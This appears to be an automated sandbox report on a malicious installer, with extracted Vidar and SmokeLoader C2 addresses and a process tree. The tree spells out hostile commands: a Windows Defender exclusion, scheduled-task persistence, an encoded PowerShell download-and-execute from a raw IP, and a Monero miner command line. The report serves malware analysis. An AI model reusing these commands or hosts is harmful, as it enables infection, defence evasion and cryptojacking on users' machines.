Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
02-12-2021 07:35
211202-je6zgsfge4 1010-09-2021 20:31
210910-za2rzaaeh3 1010-09-2021 19:40
210910-ydvmdsdffp 1010-09-2021 12:06
210910-n9s4bsdbep 1010-09-2021 05:37
210910-gbjcxahdh2 1009-09-2021 22:16
210909-17av7aghb7 1009-09-2021 22:12
210909-14mqksgha9 1009-09-2021 22:12
210909-14l42sgha8 1009-09-2021 22:11
210909-14e1qsgha7 1009-09-2021 22:11
210909-138lnacacn 10Analysis
-
max time kernel
14s -
max time network
435s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
09-09-2021 22:11
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-jp
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-fr
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win7-de
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-jp
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-fr
Behavioral task
behavioral9
Sample
setup_x86_x64_install.exe
Resource
win10-en
Behavioral task
behavioral10
Sample
setup_x86_x64_install.exe
Resource
win10-de
Errors
General
-
Target
setup_x86_x64_install.exe
-
Size
4.3MB
-
MD5
6d18c8e8ab9051f7a70b89ff7bb0ec35
-
SHA1
265311e2afd9f59e824f4b77162cf3dfa278eb7e
-
SHA256
8fe6c86b038ce91a991fe6eb8a9b323bb37b554ff6b4e5c18de3fe52d4aedf6d
-
SHA512
249bf79dc90d4662b942c7eed2a7b7816b749f6d5f7bc190bba05f826fa143d0b44f58054d8649b8626884c5fcbd1cea8abd625dc701d44b7aaac84fc74e47ff
Malware Config
Extracted
vidar
40.5
706
https://gheorghip.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral3/files/0x00030000000130ea-98.dat family_socelars -
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
-
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral3/memory/560-237-0x0000000000400000-0x0000000002BC5000-memory.dmp family_vidar -
resource yara_rule behavioral3/files/0x00030000000130db-76.dat aspack_v212_v242 behavioral3/files/0x00030000000130db-77.dat aspack_v212_v242 behavioral3/files/0x00030000000130da-78.dat aspack_v212_v242 behavioral3/files/0x00030000000130da-79.dat aspack_v212_v242 behavioral3/files/0x00030000000130dd-82.dat aspack_v212_v242 behavioral3/files/0x00030000000130dd-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 11 IoCs
pid Process 468 setup_installer.exe 1484 setup_install.exe 1604 Thu21b93295136197.exe 796 Thu2164f292a11ce.exe 560 Thu214ce31cede21.exe 1696 Thu21568b0ab8.exe 1852 Thu219d5fe8cf316.exe 1260 Thu214aaca5625.exe 1388 Thu21df5caa1b78de6.exe 860 Thu21b93295136197.tmp 424 Thu21b9847cb6727.exe -
Loads dropped DLL 31 IoCs
pid Process 1996 setup_x86_x64_install.exe 468 setup_installer.exe 468 setup_installer.exe 468 setup_installer.exe 468 setup_installer.exe 468 setup_installer.exe 468 setup_installer.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 1484 setup_install.exe 2044 cmd.exe 852 cmd.exe 2032 cmd.exe 1960 cmd.exe 1960 cmd.exe 1604 Thu21b93295136197.exe 1604 Thu21b93295136197.exe 668 cmd.exe 288 cmd.exe 288 cmd.exe 1604 cmd.exe 1004 cmd.exe 1392 HWI.exe 1392 HWI.exe 2016 cmd.exe 2016 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ipinfo.io 11 ipinfo.io 12 ip-api.com 178 api.2ip.ua 180 api.2ip.ua -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 568 864 WerFault.exe 54 2928 2404 WerFault.exe 66 3060 560 WerFault.exe 49 796 2464 WerFault.exe 72 2556 1700 WerFault.exe 86 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1476 schtasks.exe 2012 schtasks.exe 764 schtasks.exe -
Kills process with taskkill 2 IoCs
pid Process 2604 taskkill.exe 1492 taskkill.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 1996 wrote to memory of 468 1996 setup_x86_x64_install.exe 29 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 468 wrote to memory of 1484 468 setup_installer.exe 30 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 1140 1484 setup_install.exe 32 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2044 1484 setup_install.exe 33 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 2016 1484 setup_install.exe 34 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 828 1484 setup_install.exe 35 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 1960 1484 setup_install.exe 36 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 2032 1484 setup_install.exe 37 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 1004 1484 setup_install.exe 44 PID 1484 wrote to memory of 288 1484 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1140
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:832
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu219d5fe8cf316.exe4⤵
- Loads dropped DLL
PID:2044 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu219d5fe8cf316.exeThu219d5fe8cf316.exe5⤵
- Executes dropped EXE
PID:1852 -
C:\ProgramData\5315314.exe"C:\ProgramData\5315314.exe"6⤵PID:2464
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2464 -s 17407⤵
- Program crash
PID:796
-
-
-
C:\ProgramData\6817358.exe"C:\ProgramData\6817358.exe"6⤵PID:2668
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:2992
-
-
-
C:\ProgramData\3128585.exe"C:\ProgramData\3128585.exe"6⤵PID:2352
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21624565bb917a.exe4⤵
- Loads dropped DLL
PID:2016 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21624565bb917a.exeThu21624565bb917a.exe5⤵PID:1360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21a1ef054cac78a.exe4⤵PID:828
-
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21a1ef054cac78a.exeThu21a1ef054cac78a.exe5⤵PID:2420
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:2480
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2164f292a11ce.exe4⤵
- Loads dropped DLL
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu2164f292a11ce.exeThu2164f292a11ce.exe5⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b93295136197.exe4⤵
- Loads dropped DLL
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21b93295136197.exeThu21b93295136197.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\is-M1I4O.tmp\Thu21b93295136197.tmp"C:\Users\Admin\AppData\Local\Temp\is-M1I4O.tmp\Thu21b93295136197.tmp" /SL5="$4012E,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21b93295136197.exe"6⤵
- Executes dropped EXE
PID:860 -
C:\Users\Admin\AppData\Local\Temp\is-BB92E.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-BB92E.tmp\Setup.exe" /Verysilent7⤵PID:2688
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214ce31cede21.exe4⤵
- Loads dropped DLL
PID:288 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu214ce31cede21.exeThu214ce31cede21.exe5⤵
- Executes dropped EXE
PID:560 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 560 -s 9726⤵
- Program crash
PID:3060
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21df5caa1b78de6.exe /mixone4⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21df5caa1b78de6.exeThu21df5caa1b78de6.exe /mixone5⤵
- Executes dropped EXE
PID:1388 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Thu21df5caa1b78de6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21df5caa1b78de6.exe" & exit6⤵PID:2420
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Thu21df5caa1b78de6.exe" /f7⤵
- Kills process with taskkill
PID:2604
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu214aaca5625.exe4⤵
- Loads dropped DLL
PID:668 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu214aaca5625.exeThu214aaca5625.exe5⤵
- Executes dropped EXE
PID:1260 -
C:\Users\Admin\AppData\Local\Temp\is-DP3QT.tmp\Thu214aaca5625.tmp"C:\Users\Admin\AppData\Local\Temp\is-DP3QT.tmp\Thu214aaca5625.tmp" /SL5="$3015E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu214aaca5625.exe"6⤵PID:1108
-
C:\Users\Admin\AppData\Local\Temp\is-26UOC.tmp\46807GHF____.exe"C:\Users\Admin\AppData\Local\Temp\is-26UOC.tmp\46807GHF____.exe" /S /UID=burnerch27⤵PID:2200
-
C:\Program Files\Windows Photo Viewer\UEYVXYLFIO\ultramediaburner.exe"C:\Program Files\Windows Photo Viewer\UEYVXYLFIO\ultramediaburner.exe" /VERYSILENT8⤵PID:616
-
C:\Users\Admin\AppData\Local\Temp\is-4MB8N.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4MB8N.tmp\ultramediaburner.tmp" /SL5="$402C6,281924,62464,C:\Program Files\Windows Photo Viewer\UEYVXYLFIO\ultramediaburner.exe" /VERYSILENT9⤵PID:1520
-
-
-
C:\Users\Admin\AppData\Local\Temp\96-1870c-4a2-38dba-14c781deb2d2f\Nyhinuwabu.exe"C:\Users\Admin\AppData\Local\Temp\96-1870c-4a2-38dba-14c781deb2d2f\Nyhinuwabu.exe"8⤵PID:2732
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:2808
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2808 CREDAT:275457 /prefetch:210⤵PID:3136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\40-8ea24-dc2-f5996-330192ed1f7f4\Bijyvatiti.exe"C:\Users\Admin\AppData\Local\Temp\40-8ea24-dc2-f5996-330192ed1f7f4\Bijyvatiti.exe"8⤵PID:2784
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe4⤵
- Loads dropped DLL
PID:852 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21568b0ab8.exeThu21568b0ab8.exe5⤵
- Executes dropped EXE
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2212
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵PID:2328
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵PID:2432
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
PID:1476
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵PID:2768
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵PID:2808
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
PID:2012
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:1900
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵PID:2780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵PID:2368
-
C:\ProgramData\1420828.exe"C:\ProgramData\1420828.exe"8⤵PID:2088
-
-
C:\ProgramData\4488077.exe"C:\ProgramData\4488077.exe"8⤵PID:1700
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1700 -s 17409⤵
- Program crash
PID:2556
-
-
-
C:\ProgramData\2398282.exe"C:\ProgramData\2398282.exe"8⤵PID:2728
-
-
C:\ProgramData\7883581.exe"C:\ProgramData\7883581.exe"8⤵PID:2944
-
-
C:\ProgramData\1214820.exe"C:\ProgramData\1214820.exe"8⤵PID:1652
-
-
C:\ProgramData\3929418.exe"C:\ProgramData\3929418.exe"8⤵PID:2628
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵PID:2404
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2404 -s 14008⤵
- Program crash
PID:2928
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:2536
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3028
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:1492
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"7⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:2216
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Roaming\WINsoft\43523.bat" "9⤵
- Loads dropped DLL
PID:1604 -
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe10⤵
- Loads dropped DLL
PID:1392 -
C:\Users\Admin\AppData\Roaming\WINsoft\HWI.exeHWI.exe11⤵PID:2024
-
-
-
C:\Users\Admin\AppData\Roaming\WINsoft\FoxyIDM62s.exeFoxyIDM62s.exe10⤵PID:2972
-
C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp"C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"11⤵PID:468
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵PID:2036
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:532
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe4⤵PID:1716
-
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu2102ff6cfe07c.exeThu2102ff6cfe07c.exe5⤵PID:864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 864 -s 2646⤵
- Program crash
PID:568
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2156de5489c19.exe4⤵PID:924
-
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu2156de5489c19.exeThu2156de5489c19.exe5⤵PID:1372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu21b9847cb6727.exe4⤵
- Loads dropped DLL
PID:1004 -
C:\Users\Admin\AppData\Local\Temp\7zS4D1DC865\Thu21b9847cb6727.exeThu21b9847cb6727.exe5⤵
- Executes dropped EXE
PID:424
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-HBAPM.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-HBAPM.tmp\setup_2.tmp" /SL5="$201FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"1⤵PID:2176
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT2⤵PID:2428
-
-
C:\Users\Admin\AppData\Local\Temp\is-10I6I.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-10I6I.tmp\setup_2.tmp" /SL5="$301FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT1⤵PID:1224
-
C:\Users\Admin\AppData\Local\Temp\is-68507.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-68507.tmp\postback.exe" ss12⤵PID:2292
-
C:\Windows\SysWOW64\explorer.exeexplorer.exe ss13⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\tYV6FilT6.exe"C:\Users\Admin\AppData\Local\Temp\tYV6FilT6.exe"4⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"5⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\6⤵PID:2084
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F6⤵
- Creates scheduled task(s)
PID:764
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\ProgramData\chromeupdate.\chromeupdate.cmd" "6⤵PID:3468
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA7⤵PID:3572
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EB.exeC:\Users\Admin\AppData\Local\Temp\EB.exe1⤵PID:1480
-
C:\Windows\system32\taskeng.exetaskeng.exe {CF145CB3-6562-49E3-AE0E-3923B4D511E0} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]1⤵PID:3356
-
C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exeC:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe2⤵PID:3528
-
-
C:\Users\Admin\AppData\Local\Temp\F2A9.exeC:\Users\Admin\AppData\Local\Temp\F2A9.exe1⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\F2A9.exeC:\Users\Admin\AppData\Local\Temp\F2A9.exe2⤵PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\97DE.exeC:\Users\Admin\AppData\Local\Temp\97DE.exe1⤵PID:3936